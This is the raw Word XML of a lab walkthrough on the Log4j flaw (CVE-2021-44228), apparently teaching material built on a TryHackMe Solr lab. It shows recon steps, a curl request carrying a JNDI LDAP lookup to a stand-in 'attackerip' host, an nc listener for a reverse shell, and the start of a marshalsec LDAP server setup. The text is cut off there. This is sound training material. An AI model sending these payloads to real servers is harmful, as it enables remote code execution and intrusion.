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A641E" w14:textId="0CBDBC33" w:rsidR="00002460" w:rsidRDefault="00002460">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="290634297"/>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3EFFDAA5" w14:textId="2C799A39" w:rsidR="00F7760E" w:rsidRDefault="00F7760E">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="730BED51" w14:textId="14E9DFD1" w:rsidR="00E848A6" w:rsidRDefault="00F7760E">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc91633672" w:history="1">
            <w:r w:rsidR="00E848A6" w:rsidRPr="0082714B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>What is Log4j?</w:t>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc91633672 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E848A6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B9C3117" w14:textId="75034B33" w:rsidR="00E848A6" w:rsidRDefault="00E848A6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc91633673" w:history="1">
            <w:r w:rsidRPr="0082714B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Practical Demonstration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc91633673 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22141227" w14:textId="32D1DC41" w:rsidR="00E848A6" w:rsidRDefault="00E848A6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc91633674" w:history="1">
            <w:r w:rsidRPr="0082714B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc91633674 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65E9A3A0" w14:textId="67CF8604" w:rsidR="00002460" w:rsidRPr="001E39E3" w:rsidRDefault="00F7760E">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6BE74FF1" w14:textId="77777777" w:rsidR="00F7760E" w:rsidRDefault="00F7760E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7671C0" w14:textId="10DBA072" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="480" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc91633672"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>What is Log4j?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6CF6974F"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Log4j is a java package mostly a part of the Apache Logging utility used to capture logs. Everything you do on the internet becomes an event that gets captured in a form of a log. Even your inputs also get captured in logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B179341"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So, in this case, the malicious input gets captured in the log which then results in the execution of the input resulting in remote code execution. That means the attacker is executing the commands using logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627911A2" w14:textId="7D1C33C8" w:rsidR="00F7760E"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Currently, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CVSS </w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>score of this vulnerability is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> which makes it </w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>critical </w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>in severity. The CVE assigned to this vulnerability is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CVE-2021-44228</w:t>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147239B3" w14:textId="74D7E77E" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00F7760E" w:rsidP="00F7760E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A658B4" w14:textId="6B624091" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="480" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc91633673"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="303030"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Practical Demonstration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5DA5DDF6"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 xml:space="preserve">We will be using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> lab – </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C379B7">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>Solar, exploiting log4j</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> for practical purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4107C6"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Step 1 – Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD415DD" w14:textId="6A279A89" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="625D689C" wp14:editId="252DD3EB">
            <wp:extent cx="4413250" cy="7810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3250" cy="781050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F579E72" w14:textId="77777777" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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 xml:space="preserve">Using NMAP we found on port 8983 is using Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> service which can be vulnerable to log4j.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66491D"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Step 2 – Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220FC53D"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Let us try to find out the endpoint vulnerable to the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E779F" w14:textId="1A8659C3" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348317F1" wp14:editId="11F90D77">
            <wp:extent cx="5731510" cy="4756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75615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="100FED06"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The path is /admin/cores from the log file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>solr.logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E04C5FD"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Let’s try to send a malicious request to the endpoint using below payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C4757"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curl ‘</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C379B7">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>http://webserveraddress:8983/solr/admin/cores?foo=$</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>{jndi:ldap://attackerip:9999}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B99292" w14:textId="562D7D90" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="243A4847" wp14:editId="15E3908F">
            <wp:extent cx="5731510" cy="4965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96570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B38CD31"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">and turn on the listener to get a reverse shell by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="303030"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9999 and execute the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24CF0E" w14:textId="775832D9" w:rsidR="00C379B7" w:rsidRPr="00C379B7" w:rsidRDefault="00C379B7" w:rsidP="00C379B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF38975" wp14:editId="6BBAC659">
            <wp:extent cx="5731510" cy="11322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132205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828287A"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We received a signal via some special character that means it’s vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5825F"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Step 3 – Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03875D3E"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Let’s create an LDAP server locally using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF11F8">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FF11F8">
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/mbechler/marshalsec" </w:instrText>
      </w:r>
      <w:r w:rsidR="00FF11F8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C379B7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>marshalsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF11F8">
        <w:rPr>
